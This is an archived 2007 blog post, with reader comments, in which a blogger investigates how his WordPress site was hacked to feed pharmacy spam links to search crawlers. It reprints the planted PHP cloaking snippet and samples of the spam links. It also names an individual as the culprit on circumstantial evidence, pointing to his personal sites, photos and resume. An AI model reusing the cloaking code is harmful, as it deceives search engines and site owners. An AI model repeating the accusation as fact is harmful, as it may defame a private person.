Blogger tracks down the guy who hacked him, publishes his name and photo

Mirrored By DuggMirror (?) at 05:14:14 EDT Aug 22, 2007

Original URL: http://justinsomnia.org/2007/08/search-engine-marketeers-are-the-new-script-kiddies/
Comment on this story at http://digg.com/security/Blogger_tracks_down_the_guy_who_hacked_him_publishes_his_name_and_photo

View Stats on This Story's Diggs From DuggTrends

Other Mirrors: Google cache   Coral Cache 8080 8090   Archive.org Wayback Machine

justinsomnia logo justinsomnia logo
 «   star

Search Engine Marketeers are the new script kiddies

…or how Vadim Smelyansky got pwned.

On August 8th, my blog, hosted at justinsomnia.org, disappeared from Google, completely, utterly without any warning or known provocation (e.g. black hat SEO), sending the traffic to my blog plummeting.

I complained to all known and normal channels, which in my opinion are too few and far between. I checked Google’s Webmaster Central tools, which merely confirmed that my site no longer existed in their index. Frustrating.

Finally I emailed someone at Google that one of my co-workers knew. I felt bad doing this. There are millions of sites in Google. I shouldn’t have to email an individual directly for this kind of support. It just doesn’t scale. But alas. Yesterday morning I got a response. My contact at Google discovered that someone had actually hacked my site and was displaying search engine spam to search engine bots only!

Let me say that again. My blog was hacked! Ugh. So I have to admit I haven’t updated WordPress to the latest version, and I’m sure Gallery is not up to snuff either. What follows is a description of the hack and my eventually successful attempt to figure out who did this to me.

Here’s where I figure out what happened

Basically someone got access to my WordPress theme files. In footer.php the following line of code was added:

include('index2.php');

Then a file called index2.php was created that contained the following PHP code:

<?
$bots=array('ooglebot', 'yahoo', 'live', 'msn');
$y=0; for($i=0; $i<sizeof ($bots); $i++) if(strstr(strtolower($_SERVER["HTTP_USER_AGENT"]), strtolower($bots[$i]))) $y=1;
if($y){
  include('rq.txt');
}
?>

This means that if the user agent (e.g. web browser, search engine bot, feedreader, etc.) identified itself as the Google or Yahoo website indexer—instead of Firefox or Internet Explorer—the file rq.txt would be included on the page. That file contained a list of 20 search engine spam links, linking to several compromised sites (who I have notified), which in turn redirected you to the intended destination, in this case a supposed Canadian pharmaceutical e-commerce site canadianmedsworld.com:

<a href=http://www.bluehighways.com/albums/buy-levitra.html>buy levitra</a><br>
<a href=http://www.uxmatters.com/scripts/viagra-online.html>viagra online</a><br>
...

To confirm this, I switched Firefox’s user agent to Googlebot’s, Googlebot/2.1 (+http://www.google.com/bot.html), using the User Agent Switcher extension, and sure enough, the spam links appeared on EVERY PAGE of my site!!! Quelle horreur! I felt so violated.

Justinsomnia with spam links

Here’s where I figure out who did this

The timestamp on index2.php was Jul 3 13:35, which I believe was the initial date of the attack. The rq.txt file had been updated as recently as Aug 18 04:15. Then before my very eyes it was updated again yesterday, Aug 20 11:05, with even more spam links. I checked my http logs for both Aug 18 04:15 and Aug 20 11:05, but nothing looked out of the ordinary, just normal GET requests. Could my Dreamhost shell account have been compromised?—a fate even scarier than a WordPress bug.

So I started digging. Googling for the filenames created in the attack, I only found one other blog post describing the same symptoms in Spanish but without any really helpful information. My http logs don’t go back to July 3rd, but I have a JavaScript based request tracker which does. One minute after 13:35 on July 3 I found this very interesting request:

select * from request where request_id = 1857380\G
*************************** 1. row ***************************
        request_id: 1857380
       request_url: http://justinsomnia.org/
  request_referrer: http://fitis.google.com/rio/index.php?unit=adv_areas&sort_by=pr&sort_order=desc&page_n=1
      request_date: 2007-07-03 13:36:22
request_user_agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
        request_ip: 62.140.244.24

The most interesting detail is the request_user_agent value. But first some background. The reason for building a request tracker in javascript (rather than parsing server logs) is that search engine bots don’t parse JavaScript like a web browser does. So that serves as a reliable way to filter out automated requests from the human ones I’m interested in. This also means that the Googlebot user agent should NEVER appear in my stats. But sure enough, there it was, one minute after my blog’s theme had been hacked. Out of 1.9 million request records, only 70 ever identify as Googlebot (usually people who’ve changed their browser’s user agent for testing purposes). Then a day later, on July 4, my homepage was requested from the same IP (62.140.244.24), again with a user agent of “Googlebot”. What this means is that someone was manually checking my site in their web browser, masquerading at the Googlebot, to see if their hack had succeeded.

Now let’s take a look at the request_referrer value. That’s the URL of the webpage the person had in their browser when they clicked on a link pointing to http://justinsomnia.org/ (presumably out of a list of other hacked sites). First of all, http://fitis.google.com/ does not exist. That’s probably there to make the request look like it’s genuinely coming from Google. It’s very likely that they’d simply mapped that hostname to localhost in /etc/hosts. rio is presumably the name of an application for hacking sites and managing spam links. index.php is just the standard filename, and everything else is the query string. So I start Googling for a spamming application called “rio” or any occurrence of those query string variables in Google’s Code Search. Nada. Until I searched for the inauspicious adv_areas value in Google proper, and struck veritable gold.

There were only two results for that seemingly generic variable. The first of which was a mysql bug report containing what appears to be a partial database schema for an SEO hacking/spamming engine:

adv_pages_free | CREATE TABLE `adv_pages_free` (
  `adv_page_id` int(11) NOT NULL default '0',
  `randomized` int(11) unsigned default NULL,
  PRIMARY KEY  (`adv_page_id`),
  KEY `randomized` (`randomized`,`adv_page_id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 

adv_pages | CREATE TABLE `adv_pages` (
  `adv_page_id` int(11) NOT NULL auto_increment,
  `hostid` int(11) NOT NULL default '0',
  `uri` varchar(255) NOT NULL default '',
  `industry_id` smallint(4) NOT NULL default '0',
  `theme` varchar(255) default NULL,
  `filename` varchar(36) default NULL,
  `committed` timestamp NOT NULL default '0000-00-00 00:00:00',
  `commit_id` int(11) NOT NULL default '0',
  `nlinks` int(11) NOT NULL default '0',
  `keyword` text,
  PRIMARY KEY  (`adv_page_id`),
  UNIQUE KEY `uniq_page_id` (`hostid`,`uri`),
  KEY `page_id1` (`hostid`,`adv_page_id`,`uri`,`industry_id`)
) ENGINE=MyISAM AUTO_INCREMENT=21777537 DEFAULT CHARSET=latin1

adv_areas | CREATE TABLE `adv_areas` (
  `adv_page_id` int(11) NOT NULL default '0',
  `area_id` tinyint(4) NOT NULL default '1',
  `sentence_id` int(11) NOT NULL default '0',
  `anchor_text` varchar(255) NOT NULL default '',
  `promoted_id` int(11) NOT NULL default '0',
  `promoted_type` tinyint(1) NOT NULL default '2',
  `crawlMask` tinyint(4) NOT NULL default '0',
  UNIQUE KEY `uniq_area_id` (`adv_page_id`,`area_id`),
  KEY `promoted_id` (`promoted_type`,`promoted_id`),
  KEY `promoted_type_2` (`promoted_type`),
  KEY `promoted_type` (`adv_page_id`,`promoted_type`,`area_id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1

adv_hosts | CREATE TABLE `adv_hosts` (
  `hostid` int(11) NOT NULL auto_increment,
  `hostname` varchar(255) default NULL,
  `rev_hostname` varchar(255) default NULL,
  `port` smallint(6) NOT NULL default '80',
  `ip` varchar(50) default NULL,
  `classc` int(11) NOT NULL default '0',
  `oldip` varchar(50) default NULL,
  `link_industry_id` int(11) default '18',
  `g_known` tinyint(1) default '0',
  `y_known` tinyint(1) default '0',
  `m_known` tinyint(1) default '0',
  `g_banned` tinyint(1) default '0',
  `y_banned` tinyint(1) default '0',
  `m_banned` tinyint(1) default '0',
  `customized` tinyint(1) NOT NULL default '0',
  `modified` datetime default NULL,
  PRIMARY KEY  (`hostid`),
  UNIQUE KEY `hostname` (`hostname`,`port`),
  KEY `ip` (`ip`),
  KEY `iphostid` (`ip`,`hostid`),
  KEY `rev_host_name` (`rev_hostname`)
) ENGINE=MyISAM AUTO_INCREMENT=100404 DEFAULT CHARSET=latin1

You can interpret for yourself what you think the fields stand for, but it’s the 3 in the adv_hosts table that stand out the most to me: g_banned, y_banned, and m_banned. What else do G, Y, and M stand for these days other than Google, Yahoo, and Microsoft? Fields like “theme”, “filename” and “nlinks” (number of links?) also are suspicious. Note the AUTO_INCREMENT value for the adv_hosts page: 100,404! From that one could infer that as of July 16, 2007 (when the bug was reported), this guy had already hacked over 100k sites, containing 21,777,537 defaced spam pages. Stunning. Later in the bug report he adds “Unfortunately I can not provide database content.” Yeah, I bet you can’t.

That bug report contained one other incredible piece of information: the name of the reporter, one Vadim Smelyansky.

Vadim, as it turns out, is not shy on the internet. His rather unique name returns 294 pages in Google currently, including a LinkedIn profile page describing him as a Software Engineer at “SEM Professionals”. I contacted Jonathan Casuncad of the Phillipines based SEM Professionals who denies that Vadim works for him.

SEM, for the uninitiated, usually stands for “Search Engine Marketing” which is code for those who try to spam or game search engines into increasing the rank of certain search results for their clients (through any means necessary it seems). Suddenly my circumstantial evidence was looking a lot less circumstantial.

That search for “Vadim Smelyansky” in Google also returns what appears to be Vadim’s old personal homepage, www.afik1.co.il, with links to a resume last updated in 2003 and lots of pictures of Vadim, who appears to have an interest in scuba diving.

Screenshot of Vadim Smelyansky's homepage: http://www.afik1.co.il/

Continuing down through the search results we find his latest website, www.vadiaz.com with a resume up-to-date as of September 2006, describing him as working for a company called “SEM Professional” in Israel. Apparently he worked for Microsoft from 2003-2006 just before deciding to engage in criminal activities. Ironic.

Screenshot of Vadim Smelyansky's Vadiaz consulting website: http://www.vadiaz.com/

Dare I mention that his resume contains his address and phone numbers? So Vadim, what do you have to say for yourself? Considering you are a self-described expert, how would you rate my “network intrusion detection”?

Here’s where I figure out how he did this

Actually I’m not 100% sure. Dreamhost does not believe my password was leaked last June when they experienced an FTP-related leak of 3500 passwords, though the time of the first intrusion (July 3) coincides with other bloggers who discovered their sites hacked (e.g. mezzoblue). If not Dreamhost then the next likely culprit would be an unknown vulnerability in PHP or WordPress. However cross referencing the timestamps of the hacked file updates with my http access log turned up nothing.

Finally this morning Dreamhost sent me justinsomnia.org’s ftp access logs for the last 6 days which contained the smoking gun. Remember the timestamps of the updated rq.txt? Aug 18 04:15 and Aug 20 11:05. Check out the timestamps of the two most recent entries at the top of the log:

jwatt    ftpd23817    201.27.197.215   Mon Aug 20 11:05 - 11:05  (00:00)
jwatt    ftpd10510    83.170.6.133     Sat Aug 18 04:15 - 04:15  (00:00)
jwatt    ftpd31925    125.163.255.120  Wed Aug 15 17:47 - 17:47  (00:00)
jwatt    ftpd19135    125.163.255.120  Wed Aug 15 16:54 - 16:55  (00:00)

At which point I disabled FTP (which I never use), changed my passwords, and will shortly begin updating my software. But first I had to post this.

20 comments

nameblog (optional)
comment
allowed html
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>

Daaaaaamn … Don’t mess with Justin!

Take that, Vadim! What’s his number?

So, impressed with your investigation… You are now ready to be a secret agent! Watch out Vadim, you don’t know who’s blog you dared to intrude!

Marcia, his phone number is on his resume. Though I have a copy of it for my records, and though he illegally and maliciously broke into my website for profit, I had to weigh the ethics of reposting it here versus respecting some shred of his privacy—in light of the attention this post may generate. I chose the latter. Plus there’s always the wayback machine.

Stephanie, the last two days felt uncannily like the Borne Ultimatum. Without the punching.

Reminds me also of the book Cuckoo’s Egg. Tracking down hackers makes for good reading.

Great investigative work Justin! Thanks for sharing it. I will bookmark this and use it as reference. You should write a WP hardening post.

Tony, failed to mention that your CrowdVine redirector, which happened to get indexed by Google, displayed a page of my site in their cache with the spam links, which helped uncover why I got banned. And you’re the second person who’s mentioned that book.

BrianR, thanks, and btw, the crux of my hardener is here: Escalating the war on comment spam.

Speaking as an Israeli, our rise in notoriety seems to coincide with the influx of the million or so Russian immigrants some years back. Also, Israel’s single computer crime department of the police contains about 8-12 officers, some of whom are there only part time. and their budget is low.

He probably wrote the code but that doesn’t mean he personally spammed your blog. He probably sells the code.

Ron, just to be clear, I have nothing against Israelis or Russians, or Israeli-Russians. However, I do not like people breaking into my site as much as anyone would not want someone breaking into their home.

umm, does that make him any less culpable? I think not.

Just for a bit of clarity, it’s only the blackhat SEMs that do crap like this - the whitehat guys (the majority of them) keep things legal and ethical.

He’s Ukranian-Israeli. NOT Russian-Israeli!

“012373/03 The State of Israel vs. Smelyanski Vadim” (14/09/2004)

It’s for driving on the shoulder of the road in a traffic jam and then giving the police silly excuses about it. I think it fits nicely with the general pattern of antisocial behavior.

Now I know who I can get help from, to investigate on this unscrupulous hackers’ action. It is just so unethical.

Anyway, for some reason, I don’t see how you managed to find his name.

nice sleuthing, me thinks he’ll receive a fair amount of annoyance when this hits the frontpage. But I just hope it’s the right guy, you could ruin the guy’s life if he’s not the one responsible. I’d personally say follow the sleazy prescription site - the owner probably knows or is the spammer.

Soooo, the crux of it is that your blog got hacked and consequently knocked off Google’s index as a result of Dreamhost leaking passwords? Has anyone considered … y’know … kicking Dreamhosts’ arse?

David, I tried my best not to paint all SEO practitioners with the same brush, but thanks for emphasizing that point.

Mike, you are correct.

Oren, wow, thanks for that link, and the rough Hebrew translation—totally radical seeing Google Ads in Hebrew.

Keith, his name appears in this mysql bug report. The database tables described in that report, combined with his resume and LinkedIn profile listing his current employer as SEM Professional(s), all suggest that he is involved in some sort of unscrupulous activity—even if, unlikely as it would seem, he was not the person directly responsible for breaking into my account.

PsychoticApe, I tried very carefully to paint an accurate picture of the information I found, without intentionally trying to ruin his life. If I am wrong, I will retract this post and apologize.

DaveP, that may be the case, though Dreamhost doesn’t think so. Either way I can’t assign blame. It’s possible that my password got into his hands through some insecure channel.

I had a similar incident where a French student got into a Windows Server machine and uploaded about 100GB of Warez.

Only had to Google a single keyword to find all the evidence I needed. One thing lead to another and I ended up with his name, address, email, etc.

Rather satisfying :)

Terrific sherlocking… good job exposing him!